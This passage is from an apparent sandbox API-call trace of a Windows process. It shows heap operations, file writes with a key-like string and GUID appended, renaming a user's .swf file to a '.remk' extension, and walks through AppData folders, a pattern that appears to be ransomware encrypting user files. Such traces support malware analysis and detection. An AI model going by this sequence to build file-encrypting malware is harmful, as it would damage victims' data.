Flags=0x0, Size=0x204) returned 0x325fd48 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb70 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcba0 | out: hHeap=0x630000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0238.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb88 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb28 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf690 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0238.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0238.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0238.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0238.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0238.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0238.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0238.013] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x14ce7, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x14ce7, lpOverlapped=0x0) returned 1 [0238.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0238.013] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14cec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.014] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0238.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0238.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0238.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0238.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0238.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0238.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0238.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0238.014] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0238.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.014] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.014] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0238.014] CloseHandle (hObject=0x640) returned 1 [0238.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0238.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0238.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0238.019] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\YBiLRAZYH9yEkpgFaG.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\ybilrazyh9yekpgfag.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\YBiLRAZYH9yEkpgFaG.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\ybilrazyh9yekpgfag.swf.remk")) returned 1 [0238.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0238.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0238.020] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0238.021] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ce78970, ftCreationTime.dwHighDateTime=0x1d5d7e6, ftLastAccessTime.dwLowDateTime=0xde495a90, ftLastAccessTime.dwHighDateTime=0x1d5e120, ftLastWriteTime.dwLowDateTime=0xde495a90, ftLastWriteTime.dwHighDateTime=0x1d5e120, nFileSizeHigh=0x0, nFileSizeLow=0x14cec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBiLRAZYH9yEkpgFaG.swf", cAlternateFileName="YBILRA~1.SWF")) returned 0 [0238.022] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0238.022] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6570 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3186060 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31861d0 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3186118 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ec88 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185e38 | out: hHeap=0x630000) returned 1 [0238.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6960 | out: hHeap=0x630000) returned 1 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6960 [0238.023] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\") returned="Search\\" [0238.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ec88 [0238.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0238.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0238.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0238.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0238.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0238.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0238.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0238.027] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf690 [0238.028] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0238.028] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.028] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.028] PathFindFileNameW (pszPath="") returned="" [0238.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.030] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.030] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.030] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.030] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0238.030] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x3189278 [0238.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf690 [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6960 [0238.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ec88 [0238.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0238.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0238.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0238.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS 